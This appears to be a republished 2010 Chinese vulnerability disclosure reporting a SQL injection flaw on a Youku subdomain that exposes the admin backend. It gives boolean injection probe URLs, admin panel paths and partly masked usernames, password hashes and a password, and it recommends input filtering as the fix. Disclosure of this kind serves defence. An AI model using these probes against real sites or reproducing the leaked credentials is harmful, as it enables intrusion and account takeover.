日期:2010-09-14 00:04:00 来源:本站整理
youku网存在注入漏洞及修复筹划:可登录后台 举行视频考核操作、投票数...[网络技术]
本文“youku网存在注入漏洞及修复筹划:可登录后台 举行视频考核操作、投票数...[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
扼要描写:
通过sql注入得到后台密码,登录后可以举行视频考核操作、投票数改正操作(有做弊嫌疑哦~~).
有截图(wooyun目前不支持)
具体阐明:
http://sww.youku.com/lists.php?tag=whhyn' and '1'='1
http://sww.youku.com/lists.php?tag=whhyn' and '1'='2
http://sww.youku.com/admin/main.php
http://minisite.youku.com/admin/main.php
漏洞证明:
用户、密码信息:
youku_***|1c63129ae9db9c60c3e8aa94d3e00***
youku_sp***|1c63129ae9db9c60c3e8aa94d3e00***
1q***wsx
*为马赛克
修复筹划:
过滤用户提交内容.
以上是“youku网存在注入漏洞及修复筹划:可登录后台 举行视频考核操作、投票数...[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“youku网存在注入漏洞及修复筹划:可登录后台 举行视频考核操作、投票数...”更多相关内容
中查找“youku网存在注入漏洞及修复筹划:可登录后台 举行视频考核操作、投票数...”更多相关内容评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论